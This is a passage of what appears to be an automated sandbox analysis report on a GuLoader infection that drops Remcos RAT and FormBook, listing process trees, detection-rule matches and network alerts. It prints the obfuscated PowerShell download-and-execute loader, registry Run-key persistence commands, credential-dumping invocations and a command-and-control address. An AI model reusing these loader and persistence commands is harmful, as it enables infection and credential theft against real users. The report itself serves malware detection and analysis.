Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. 
oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • wab.exe (PID: 1244 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                  • cmd.exe (PID: 6628 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • reg.exe (PID: 6780 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
                  • qeKrnFkDzDT.exe (PID: 5568 cmdline: "C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                    • srdelayed.exe (PID: 744 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
                    • relog.exe (PID: 5004 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)
                      • qeKrnFkDzDT.exe (PID: 792 cmdline: "C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                      • firefox.exe (PID: 3408 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • wab.exe (PID: 7584 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7588 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7600 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4208 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Formbook, Formbo
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution:
  • SWEED
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\sfvnspt.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x8fd9:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x2abc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security

Source | Rule | Description | Author
amsi64_7616.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7860.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0xd8da:$b2: ::FromBase64String(
            • 0xc95a:$s1: -join
            • 0x6106:$s4: +=
            • 0x61c8:$s4: +=
            • 0xa3ef:$s4: +=
            • 0xc50c:$s4: +=
            • 0xc7f6:$s4: +=
            • 0xc93c:$s4: +=
            • 0x15f3b:$s4: +=
            • 0x15fbb:$s4: +=
            • 0x16081:$s4: +=
            • 0x16101:$s4: +=
            • 0x162d7:$s4: +=
            • 0x1635b:$s4: +=
            • 0xd17b:$e4: Get-WmiObject
            • 0xd36a:$e4: Get-Process
            • 0xd3c2:$e4: Start-Process
            • 0x16bd8:$e4: Get-Process
amsi32_5288.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_8084.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xa1b3:$b2: ::FromBase64String(
              • 0x921a:$s1: -join
              • 0xffaf:$s3: Reverse
              • 0x29c6:$s4: +=
              • 0x2a88:$s4: +=
              • 0x6caf:$s4: +=
              • 0x8dcc:$s4: +=
              • 0x90b6:$s4: +=
              • 0x91fc:$s4: +=
              • 0x12635:$s4: +=
              • 0x126b5:$s4: +=
              • 0x1277b:$s4: +=
              • 0x127fb:$s4: +=
              • 0x129d1:$s4: +=
              • 0x12a55:$s4: +=
              • 0x9a4e:$e4: Get-WmiObject
              • 0x9c3d:$e4: Get-Process
              • 0x9c95:$e4: Start-Process
              • 0x132b9:$e4: Get-Process

System Summary

              Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ProcessId: 5904, ProcessName: cmd.exe
              Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Almindeligheden
              Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5904, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ProcessId: 4504, ProcessName: reg.exe
              Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)", ProcessId: 5904, ProcessName: cmd.exe
              Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems): Data: Details: %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Almindeligheden
              Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7328, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" , ProcessId: 7360, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGti
              Timestamp                        SID      Severity  Source Port  Destination Port  Protocol  Classtype
              2024-08-28T14:04:42.147766+0200  2855464  1         49768        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:15.934465+0200  2855464  1         49760        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:08.970058+0200  2855465  1         49745        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:44.668227+0200  2855465  1         49769        80                TCP       A Network Trojan was detected
              2024-08-28T14:02:33.150777+0200  2803270  2         49744        80                TCP       Potentially Bad Traffic
              2024-08-28T14:04:05.109115+0200  2855465  1         49757        80                TCP       A Network Trojan was detected
              2024-08-28T14:01:49.458361+0200  2803270  2         49737        443               TCP       Potentially Bad Traffic
              2024-08-28T14:04:10.871771+0200  2855464  1         49758        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:43.242699+0200  2855464  1         49750        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:29.050512+0200  2855464  1         49764        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:59.981894+0200  2855464  1         49755        80                TCP       A Network Trojan was detected
              2024-08-28T14:01:55.733878+0200  2032777  1         57484        49738             TCP       Malware Command and Control Activity Detected
              2024-08-28T14:03:25.070543+0200  2855464  1         49746        80                TCP       A Network Trojan was detected
              2024-08-28T14:05:12.409303+0200  2855465  1         49777        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:39.621945+0200  2855464  1         49767        80                TCP       A Network Trojan was detected
              2024-08-28T14:05:09.964722+0200  2855464  1         49776        80                TCP       A Network Trojan was detected
              2024-08-28T14:05:18.919734+0200  2855464  1         49778        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:24.326359+0200  2032777  1         57484        49738             TCP       Malware Command and Control Activity Detected
              2024-08-28T14:04:23.975590+0200  2855464  1         49762        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:27.599191+0200  2855464  1         49747        80                TCP       A Network Trojan was detected
              2024-08-28T14:01:55.002482+0200  2032776  1         49738        57484             TCP       Malware Command and Control Activity Detected
              2024-08-28T14:03:45.776632+0200  2855464  1         49751        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:32.741111+0200  2855465  1         49749        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:53.283615+0200  2855464  1         49771        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:51.095333+0200  2855464  1         49770        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:58.730195+0200  2855465  1         49773        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:26.541437+0200  2855464  1         49763        80                TCP       A Network Trojan was detected
              2024-08-28T14:05:04.819790+0200  2855464  1         49774        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:55.821968+0200  2855464  1         49772        80                TCP       A Network Trojan was detected
              2024-08-28T14:05:07.328379+0200  2855464  1         49775        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:50.835146+0200  2855465  1         49753        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:57.553845+0200  2855464  1         49754        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:13.389766+0200  2855464  1         49759        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:18.440443+0200  2855465  1         49761        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:31.580553+0200  2855465  1         49765        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:01.584087+0200  2855464  1         49756        80                TCP       A Network Trojan was detected
              2024-08-28T14:01:56.654315+0200  2803304  3         49741        80                TCP       Unknown Traffic
              2024-08-28T14:03:30.124862+0200  2855464  1         49748        80                TCP       A Network Trojan was detected
              2024-08-28T14:04:38.000818+0200  2855464  1         49766        80                TCP       A Network Trojan was detected
              2024-08-28T14:03:48.309831+0200  2855464  1         49752        80                TCP       A Network Trojan was detected

              AV Detection

              Source: Yara match, File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara match, File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 17_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,17_2_00404423
              Source: unknown, HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_23D710F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898

              Software Vulnerabilities

              Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Network traffic, Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49738 -> 172.111.137.132:57484
